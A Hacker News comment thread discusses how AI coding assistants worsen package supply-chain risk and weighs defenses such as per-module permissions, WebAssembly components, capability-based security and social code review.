Hacker Newsnew | past | comments | ask | show | jobs | submitlogin

This is a real problem, and AI is a new vector for it, but the root cause is the lack of reliable trust and security around packages in general.

I really wonder what the solution is.

Has there been any work on limiting the permissions of modules? E.g. by default a third-party module can't access disk or network or various system calls or shell functions or use tools like Python's "inspect" to access data outside what is passed to them? Unless you explicitly pass permissions in your import statement or something?



You may be interested in WebAssembly Components: https://component-model.bytecodealliance.org/.

Components can't do any IO or interfere with any other components in an application except through interfaces explicitly given to them. So you could, e.g., have a semi-untrusted image compression component composed with the rest of your app, and not have to worry that it's going to exfiltrate user data.


So you refuse to learn from the history, because that's basically the UNIX model. That you string together simple text processing programs and any misbehaving program gets sigsegv without endangering anything, you don't have to worry. But it transpired that:

1. splitting functionality in such way is not always possible or effective/performant, not to mention operators in practice tend to find fine grained access control super annoying

2. and more importantly, even if the architecture is working, hostile garbage in your pipeline WILL cause problems with the rest of your app.


It doesn't seem like a stretch that an LLM will very soon be able to configure your dependent web assembly components to permit the dangerous access. It feels like this model of security, while definitely a step in the right direction, won't make a novice vibe coder any more secure.


It seems like it would be rare, though.

An LLM might hallucinate the wrong permissions, but they're going to be plausible guesses.

It's extremely unlikely to hallucinate full network access for a module that has nothing to do with networking.


I'm saying no hallucination will be happening.

The LLM will happily write code that permits network access, because it read online an example that did that. And, unless you know better, you won't know to manually turn that off.

Sandboxed WebComponents does not solve anything if your LLM thinks it is helping when it lets the drawbridge down for the orcs.


That's a separate conversation then, because there's wrong information everywhere, but LLM's still do mostly OK. They don't just regurgitate stuff blindly, they look for patterns.

And the article here is specifically about hallucinations, when it tries to plausibly fill something in according to a pattern.

Wrong information on the internet is as old as the internet...


Wrong code on the Internet does not steal your credit card information. Wrong code on localhost does.

But, I think we agree, anyway.


Java used to have Java Security Manager, which basically made it possible to set permissions for what a jar/dependency could do. But deprecated and no real good alternative anymore.


Java could have really nice security if it provided access to OS API via interfaces with main function receiving the interface for the real implementation. It would be possible then to implement really tight sandboxes. But that ship sailed 30 years ago…


My crank opinion is that we should invest in capability-based security, or an effects system, for code in general, both internal and external. Your external package can't pwn you if you have to explicitly grant it permissions it shouldn't have.


I wonder how you could retrofit something like that onto Go for instance. I've always thought a buried package init function could be devastating. Allow/deny listing syscalls, sockets, files, etc for packages could be interesting.


Most languages have that early init problem. C++ allows global constructors, Java has class statics, Rust can also initialize thing globally.

Even C allows library initializers running arbitrary code. It was used to implement that attack against ssh via malicious xz library.

Disabling globals that are not compile-time constants or at least are never initialized unless the application explicitly called things will nicely address that issue. But language designers think that running arbitrary code before main is a must.


Rust doesn't have static initialisers for complex objects; it has lazy initialisers in the standard library that run when they're first requested, but there's no way to statically initialise any object more complex than a primitive: https://doc.rust-lang.org/reference/items/static-items.html#...


Thanks, I stand corected. Rust does not allow to initialize globals with arbitrary code running before main even with unsafe.

One more point to consider Rust over C++.


> This is a real problem, and AI is a new vector for it, but the root cause is the lack of reliable trust and security around packages in general.

I agree. And the problem has intensified due to the explosion of dependencies.

> Has there been any work on limiting the permissions of modules?

With respect to PyPI, npm, and the like, and as far as I know: no. But regarding C and generally things you can control relatively easily yourself, see for instance:

https://hn.algolia.com/?dateRange=all&page=0&prefix=true&que...


It would be useful to have different levels of restrictions for various modules within a single process, which I don’t think pledge can do.


I don't think it's a bad idea, but currently packages aren't written with adversarial packages in mind. E.g. requests in Python should have network access, but probably not if it's called from a sandboxed package, but you might be able to trick certain packages into calling functions for you without having your package in the call stack (e.g. asyncio event loop or Thread). I think any serious attempt would get pushback from library authors.

Also it's hard to argue against hard process isolation. Specter et al are much easier to defend against at process boundaries. It's probably higher value to make it easier to put sub modules into their own sandboxed processes.


> It would be useful to have different levels of restrictions for various modules within a single process, which I don’t think pledge can do.

Sure: the idea could be improved a lot. And then there is the maintenance burden. Here, perhaps a step forward would be if every package author would provide a "pledge" (or whatever you want to call the idea) instead of others trying to figure out what capabilities are needed. Then you could also audit whether a "pledge" holds in reality.


We do have tools but adoption is sparse. It still too much hassle.

You can do SLSA, SBOM and package attestation with confirmed provenance.

But as mentioned it still is some work but more tools pop up.

Downside is when you will have signed attested package that still will become malicious just like malware creators were signing stuff with help of Microsoft.


To build tokenizers that use hashed identifiers rather than identifiers as plain English?

e.g, "NullPointerException" can be a single kanji. Current LLM processes it like "N, "ull", "P", "oint", er", "Excep", "tion". This lets them make up "PullDrawerException", which is only useful outside code.

That kind of creativity is not useful in code, in which identifiers are just friendly names for pointer addresses.

I guess real question is how much business sense such a solution would make. "S in $buzzword stands for security" kind of thing.


Why not train an LAM, a Large AST Model?


That will miss comments and documentation.


If that were true of AST implementations then "prettier"-esque tooling wouldn't exist. https://github.com/prettier/prettier/blob/3.5.3/src/main/com...


It's deeper than the security issue

You could have two different packages in a build doing similar things -- one uses less memory but is slower to compute than the other -- so used selectively by scenario from previous experience in production

If someone unfamiliar with the build makes a change and the assistant swaps the package used in the change -- which goes unnoticed as the package itself is already visible and the naming is only slightly different, it's easy to see how surprises can happen

(I've seen o3 do this every time the prompt was re-run in this situation)


The solution is social code review, don't use modules that haven't been reviewed by at least N people you trust.

https://github.com/crev-dev/


In Smolagents you can provide which packages are permitted. Maybe that's a shortcut to enforce this? I can't imagine that in a professional development house it's truly an n x m over all possible libraries.




Consider applying for YC's Summer 2026 batch! Applications are open till May 4

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: